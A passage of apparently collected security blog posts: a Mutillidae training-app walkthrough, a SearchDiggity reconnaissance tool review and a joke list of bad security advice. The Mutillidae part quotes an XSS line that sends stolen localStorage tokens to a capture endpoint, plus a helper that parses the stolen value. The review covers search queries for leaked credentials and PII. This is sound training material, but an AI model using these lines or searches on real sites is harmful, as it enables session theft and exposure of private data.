According to Jeremy, "Mutillidae is being used as a web security training environment for corporate developer training where developers learn not only how web exploits work but how to exploit the sites themselves. Armed with this knowledge, they appreciate more readily the importance of writing secure code and understand better how to write secure code. Mutillidae is also used in a similar capacity in the graduate Information Security course at the University of Louisville Speed-Scientific Engineering School. Mutillidae has been included as a target in the Samurai-WTF web pen testing distribution since version 1.x and was recently added to Rapid7's Metasploitable-2 project. Over the last couple of years, Mutillidae has been part of CTF (capture the flag) competitions at Kentuckiana ISSA conferences and the 2012 AIDE Conference held at Marshall University. Because Mutillidae provides a well-understood set of vulnerabilities beyond the OWASP Top 10, it is used as a platform to evaluate security assessment tools in order to see which issues the tool can identify."
No time like the present to see what all the positive feedback is about. Adrian has a great video on the Irongeek site describing five of the most well-known vulnerabilities found in the 2007 OWASP Top 10, specifically cross-site scripting (XSS), SQL/command injection flaws, malicious file execution, insecure direct object reference, and cross-site request forgery (CSRF/XSRF). Don’t forget the webpwnized YouTube channel as well! To break from what’s already well documented, I’ve opted here to discuss discovery of some of the less well known or popular vulnerabilities.
I’ll start you out of sequence in the OWASP Top 10 2010 with A8 - Failure To Restrict URL Access. Directly from the OWASP A8 description, applications do not always protect page requests properly. "Sometimes, URL protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget. Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack." What’s one of the best ways to discover potentially unrestricted URLs that should otherwise be protected? At the top of my list of first things to do during penetration tests is checking for a robots.txt file. Robots.txt is usually used to teach search crawlers how to behave when interacting with your site (thou shalt not crawl), but it’s also used by attackers, good and bad, to find interesting functionality or pages you don’t wish dissected. Mutillidae teaches a quick lesson here via http://192.168.195.128/mutillidae/robots.txt as seen in Figure 1.

Figure 1: Explore me
We find more than a few nuggets of goodness here to which access should never be allowed on sites you care anything about or don’t want tipped over in mere minutes if exposed to the Internet. No need to read documentation or conduct a web search for an account with which to log in to Mutillidae; the accounts.txt file in the exposed passwords directory will provide you everything you need. The config.inc file and the classes directory are freely available for browsing; config.inc will dump the above-mentioned MySQL database connection strings. We’ll use content from the javascript directory against Mutillidae later in this discussion, and it’s never a good idea to expose your site’s documentation or the libraries you utilize to protect your site. The owasp-esapi-php directory contains the libraries and source code associated with the OWASP Enterprise Security API which, when properly configured and restricted, is an excellent method for protecting your site from OWASP Top 10 vulnerabilities.
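Pulling those candidate URLs out of robots.txt is easily scripted; a minimal Python sketch (fetch the file however you like and pass in its text):

```python
from urllib.parse import urljoin

def disallowed_urls(robots_txt, base_url):
    """Resolve each Disallow entry in robots.txt against the site root;
    every one is a candidate URL the site owner didn't want crawled."""
    urls = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()  # strip comments
        if line.lower().startswith("disallow:"):
            path = line.split(":", 1)[1].strip()
            if path:
                urls.append(urljoin(base_url, path))
    return urls
```

Feeding it the Mutillidae robots.txt surfaces the passwords directory, config.inc, and friends in one pass.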

The OWASP Top 10 2010 A8 category is closely related to A6 - Security Misconfiguration; I really consider Failure to Restrict URL Access a subset of the A6 category. A6 also includes scenarios such as an application server configuration that "allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide." So true. While playing with Mutillidae to learn about the Top 10 2010 A1 - Injection category you may benefit from a nice example of improper error handling as seen in Figure 2.

Figure 2: Failure is always an option


HTML 5 Web Storage serves as a great example of OWASP Top 10 2010-A7-Insecure Cryptographic Storage. It represents storage, sure, but when configured as badly (by design) as it is on Mutillidae, no cryptography will save you. Case in point, HTML 5 local storage. Take note of localStorage.getItem and setItem calls implemented in HTML5 pages, as they help detect when developers build solutions that put sensitive information in local storage, which is a bad practice. Mutillidae offers excellent examples of ways to take advantage of getItem/setItem fail. You’ll find some detailed test scripts to experiment with and modify in the Mutillidae documentation folder. Remember I said it’s a good idea to protect documentation folders? I tweaked one of the examples to express my feelings for Mutillidae (setItem via MOD) and mock the victim while lifting their session data via XSS:

MOUSEOVER me and I’ll rob you blind! 

Figure 3 shows the resulting alert.

Figure 3: GotItem...like your Secure.Authentication token
While this example spawns an alert window when moused over, it could just as easily have been configured to write the results to an evil server. Mutillidae plays similarly for your pwn pleasure via the capture-data.php script by defining the likes of document.location="http://localhost/mutillidae/capture-data.php?html5storage=" in test scripts.
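On the receiving end, recovering the stolen storage from such a request is one line of parsing; a Python sketch of what a capture endpoint like capture-data.php sees (the parameter name mirrors the example above):

```python
from urllib.parse import urlparse, parse_qs

def captured_storage(request_url):
    """Pull the html5storage value an XSS payload appended to the
    capture URL; parse_qs also URL-decodes it for us."""
    params = parse_qs(urlparse(request_url).query)
    return params.get("html5storage", [""])[0]
```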

Finally, a quick look at OWASP Top 10 2010-A10-Unvalidated Redirects and Forwards with Burp Suite Pro. Among the plethora of other vulnerabilities readily discovered with Burp’s Scanner functionality, it’s my favorite tool for discovering open redirects too. Browse the Mutillidae menu for OWASP Top 10 then A10 and scan the Credits page. Your results should match mine as seen in Figure 4.


Figure 4: forwardurl...to wherever you’d like
From CWE-601 : "An HTTP parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance."
We wouldn’t want that would we?
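The fix is server-side validation of the forwardurl value before issuing the redirect; a minimal Python sketch (the allow-listed host is a placeholder):

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = {"www.example.org"}  # hosts you actually intend to forward to

def safe_redirect_target(url, default="/"):
    """Permit relative paths and allow-listed hosts only; anything
    else (including scheme-relative //evil tricks) falls back to a
    safe default, mitigating CWE-601."""
    parts = urlparse(url)
    if not parts.scheme and not parts.netloc:
        return url  # relative path within the site
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return url
    return default
```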
Clearly, Mutillidae as a learning tool is indispensable. Make use of it for your own learning as well as that of the development teams you support. Weave it into your SDLC practices; you can’t go wrong.

In Conclusion

In late September, the current release of Mutillidae will be introduced at the upcoming annual Kentuckiana ISSA InfoSec Conference in Louisville, KY. This conference includes four different tracks, with Mutillidae slated as one of the breakout sessions in the web application security track. All you Kentucky-area ISSA members (and non-member readers), please consider attending and discovering more about this great learning tool. Everyone else, set up Mutillidae immediately, sit down with your developer teams, and ensure their full understanding of how important secure coding practices are. Use Mutillidae as a tool to help them achieve that understanding.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers...until next month.

Acknowledgements

Jeremy Druin, NOWASP Mutillidae 2.0 developer

toolsmith: SearchDiggity - Dig Before They Do












Prerequisites
Windows .NET Framework

Introduction
I’ve been conducting quite a bit of open source intelligence gathering (OSINT) recently as part of a variety of engagements and realized I hadn’t discussed the subject since we last reviewed FOCA in March 2011 or Search Engine Security Auditing in June 2007. I’d recently had a few hits on my feed reader, and at least one mailing list, regarding SearchDiggity from Fran Brown and Rob Ragan of Stach & Liu. They’d recently presented Pulp Google Hacking at the 4th Annual InfoSec Summit at ISSA Los Angeles as well as Tenacious Diggity at DEFCON 20, and the content certainly piqued my interest. One quick look at the framework and all its features and I was immediately intrigued. At first glance you note similarities to Wikto and FOCA given SearchDiggity’s use of the Google Hacking Database and Shodan. This is no small irony as this team has taken point on rejuvenating the art of the search engine hack. In Fran’s InformationWeek report, Using Google to Find Vulnerabilities In Your IT Environment, he discusses toolsmith favorites FOCA, Maltego, and Shodan amongst others. I’ll paraphrase Fran from this March 2012 whitepaper to frame why using tools such as SearchDiggity and others in the Diggity arsenal is so important: use these same methods to find flaws before the bad guys do; these methods use search engines such as Google and Bing to identify vulnerabilities in your applications, systems and services, allowing you to fix them before they can be exploited. Fran and Rob’s work has even hit mainstream media, with the likes of NotInMyBackyard (included in SearchDiggity) achieving coverage in USA Today. Suffice it to say that downloads from the Google Hacking Diggity Project pages jumped by 45,000 almost immediately, fueled largely by non-security consumers looking to discover any sensitive data leaks related to themselves or their organizations.
A nice problem to have for the pair from Stach & Liu and one Fran addressed with a blogpost to provide a quick intro to NotInMyBackYardDiggity, to be discussed in more detail later in this article.  
I reached out to Fran and Rob rather late in this month’s writing process and am indebted to them as they kindly accommodated me with a number of resources as well as a few minutes for questions via telephone. There are Diggity-related videos and tool screenshots available, as well as all the presentations the team has given in the last few years. The SearchDiggity team is most proud of their latest additions to the toolset, including NotInMyBackyard and PortScan. Keep in mind that, like so many tools discussed in toolsmith, SearchDiggity and its various elements were written to accommodate the needs of the developers during their own penetration tests and assessments. No cached data is safe from the Diggity Duo’s next generation search engine hacking arsenal, and all their tools are free for download and use.

Installing Search Diggity

SearchDiggity installation is point-and-click simple after downloading the installation package, but there are a few recommendations for your consideration. The default installation path is C:\Program Files (x86)\SearchDiggity, but consider using a non-system drive as an installation target to ensure no permissions anomalies; I installed in D:\tools\SearchDiggity. SearchDiggity writes results files to DiggityDownloads (I set D:\tools\DiggityDownloads under Options | Settings | General) and will need permission to its root in order to Update Query Definitions (search strings, Google/Bing Dorks).

Using SearchDiggity

I started my review of SearchDiggity capabilities with the Bing Hacking Database (BHDB) under the Bing tab and utilizing the menu referred to as BHDBv2NEW as seen in Figure 1.

Figure 1: A BHDB analysis of HolisticInfosec.org
As with any tool, optimizing your scan settings for your target before you start the scan run is highly recommended. Given that my site is not an Adobe ColdFusion offering, there’s really no need to look for CFIDE references, right? Ditto for Outlook Web Access or SharePoint, but CMS Config Files with XSS and SQL injection instreamset options are definitely in order. Good news: no significant findings were noted using my domain as the target.

NotInMyBackyard is a recent addition to SearchDiggity for which the team has garnered a lot of deserved attention, and as such we’ll explore it here. I used my name as my primary search parameter, configured Methods to include Quotes, and set Locations to include:
1)      Cloud Storage (Dropbox, Google Docs, Microsoft Skydrive, Amazon AWS)
2)      Document Sharing (scribd.com, 4shared.com, issuu.com, docstoc.com, wepapers.com)
3)      Pastebin (pastebin.com, snipt.org, drupalbin.com, paste.ubuntu.com, tinypaste.com, paste2.org, codepad.org, dpaste.com, pastie.org, pastebin.mozilla.org)
4)      Social (Facebook, Twitter, YouTube, LinkedIn)
5)      Forums (groups.google.com)
6)      Public presentations charts graphs videos (Slideshare, Prezi, present.me, Gliffy, Vimeo, Dailymotion, Metacafe)
You can opt to set additional parameters such as Extensions for document types, including all versions of Microsoft Office, PDF, CSV, TXT, database types including MS-SQL and Access, backup, logs, and config files, as well as test and script files. My favorites (utilized in a separate run) are the financial file options, including Quicken and QuickBooks data files and QuickBooks backup files. Finally, there are a number of granular keyword selections to narrow your query results that might include your patient records, places of birth, or your name in a data dump. This is extremely useful when trying to determine if your email address, as associated with one of your primary accounts, has been accumulated in a data dump posted to a Pastebin-like offering. Just keep in mind, the more options you select the longer your query run will take. I typically carve my searches up into specific categories, then export the results to a file named for the category.
As seen in Figure 2, NotInMyBackyard reveals all available query results in a clean, legible manner that includes hyperlinks to the referenced results, allowing you to validate the findings.

Figure 2: NotInMyBackyard flushes out results
I found that my search, as configured, was most enlightening with respect to all the copies of my material posted to other sites without my permission. It was also interesting to see where articles and presentation material were cited in academic material. Imagine using your organizational domain name and specific keywords and accounts to discover what’s exposed to the evildoers conducting the same activity.
You can focus similar activity with more attention to the enterprise mindset utilizing SearchDiggity’s DLP offerings. First conduct a Google or Bing run against a domain of interest using the DLPDiggity Initial selection. Once the query run is complete, highlight all the files (CTRL-A works well), and click the download button. This will download all the files to the download directory you configured, populating it with files discovered using DLPDiggity Initial, against which you can then apply the full DLP menu. I did as described against a target that shall remain unnamed and found either valid findings or sample/example data that matched the search regex explicitly as seen in Figure 3.

Figure 3: Data Leak Prevention with SearchDiggity
 I only used the Quick Checks set here too. When you contemplate the likes of database connection strings, bank account numbers, and encryption-related findings, coupled with the requisite credit cards, SSNs, and other PII, it becomes immediately apparent how powerful this tool is for both prevention and discovery during the reconnaissance phase of a penetration test.

I’ll cover one more SearchDiggity component, but as is usually the case with toolsmith topics, there is much about the tool du jour that remains unsaid. Be sure to check out the SearchDiggity Shodan and PortScan offerings on your own. I’m always particularly interested in Flash-related FAIL findings, and SearchDiggity won’t disappoint here either. Start with a Google or Bing search against a target domain with FlashDiggity Initial enabled. Much as noted with the DLP feature, after discovery, SearchDiggity will download the SWF files it identifies with FlashDiggity Initial. As an example I ran this configuration without a domain specified. By default, for a Google search, 70 results per query will be returned. Suffice it to say that with the three specific queries defined in FlashDiggity Initial searches, I was quickly treated to 210 results, which I then opted to download. I switched over to the Flash menu and, for real s’s and g’s (work that one out on your own :-)), enabled all options. Figure 4 exemplifies (anonymously) just how concerning certain Flash implementations may be, particularly when utilized for administrative functions and authentication.

Figure 4: Find bad Flash with SearchDiggity
FlashDiggity decompiles the downloaded SWF files with Flare and stores the resulting .flr file in the download directory for your review. It should go without saying that flaw enumeration becomes all that much easier. As an example, FlashDiggity’s getURL XSS detection discovered the following using geturl\(.*(_root\.|_level0\.|_global\.).*\) as its regex logic:
this.getURL('mailto:' + _global.escape(this.decodeEmailAddr(v2.emladdr)) + '?subject=' + _global.escape(v2.emlsubj) + '&body=' + _global.escape(this.getEmailContent()));
This snippet makes for interesting analysis. Risks associated with getURL are well documented, but the global escape may mitigate the issue. That said, the Flash file was created with TechSmith Camtasia in January 2009, and an XSS vulnerability was reported in October 2009 regarding SWF files created with Camtasia Studio. Yet SWF files hosted on TechSmith’s Screencast service were not vulnerable, and more than one reference to Screencast was noted in the decompiled .flr file. With one FlashDiggity search, we were able to learn a great deal about potentially flawed Flash files subject to possible exploit.
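If you want to re-run that same check yourself against a directory of decompiled output, the detection reduces to a one-regex scan. The regex below is the one FlashDiggity reported; the surrounding scanner function is my own hypothetical wrapper, not part of the tool.

```python
import re

# FlashDiggity's getURL XSS detection regex, as quoted above; case-insensitive
# so it catches both getURL and the lowercased forms Flare sometimes emits.
GETURL_XSS = re.compile(r"geturl\(.*(_root\.|_level0\.|_global\.).*\)",
                        re.IGNORECASE)

def find_geturl_sinks(flr_text):
    """Return lines of decompiled Flare (.flr) output where a _root, _level0,
    or _global value (i.e., potentially attacker-influenced input) flows into
    a getURL call."""
    return [line.strip()
            for line in flr_text.splitlines()
            if GETURL_XSS.search(line)]
```

Feed it the text of each .flr file in the download directory and triage the hits by hand, paying attention to whether the tainted value is escaped before reaching getURL, as in the mailto example above.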
And we didn’t even touch SearchDiggity’s malware analysis feature set.  

In Conclusion

As always I’ll remind you: please use SearchDiggity for good, not evil. Incorporating its use as part of your organizational defensive tactics is a worthy effort. Keep in mind that you can also leverage this logic as part of the Google Hacking Diggity Defense Tools, including the Alert and Monitoring RSS feeds. Configure them with your specific and desired organizational parameters and enjoy real-time alerting and monitoring via your RSS feed reader. For those of you defending Internet-facing SharePoint implementations, you’ll definitely want to check out the SharePoint Diggity Hacking Project too.
Enjoy this tool arsenal from Stach & Liu’s Dynamic Duo; they’d love to hear from you with kudos, constructive criticism, and feature requests via diggity at stachliu.com.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Francis Brown and Rob Ragan, Managing Partners, Stach & Liu, Google Hacking Diggity project leads

The replacement security analyst's Top 10

I'm a huge football fan so the depth of my joy at the return of the "real" NFL referees cannot be measured. Given the replacement ref debacle I felt compelled to share a replacement security analyst's Top 10.
Note: at one time or another in my career I have truly heard all of these.
In no particular order...

  1. Disable AV altogether; it's inconvenient when moving malware samples around.
  2. Passwords longer than eight characters make it hard to do your job.
  3. Don't worry about chain of custody or evidence integrity, cases rarely go to court anyway.
  4. When a concerned user calls about a potentially compromised system, tell them to just run McAfee Stinger.
  5. Why would you want to keep DNS logs?
  6. Go ahead and give developers the ability to deploy code straight to production from their desktops. It helps them be agile and creates efficiency.
  7. Proxying egress web traffic is an invasion of privacy and makes users mad, so don't do it.
  8. Your vulnerability scanner is causing my service to crash! Turn it off!
  9. We don't need to fix XSS. You can't hack a server with it.
  10. But it is encrypted. We used MD5 hashing to store the credit cards in the database.
In a similar vein, you'll really enjoy Infosec Reactions if you haven't already seen it.
Welcome back, NFL refs. :-)
Cheers.
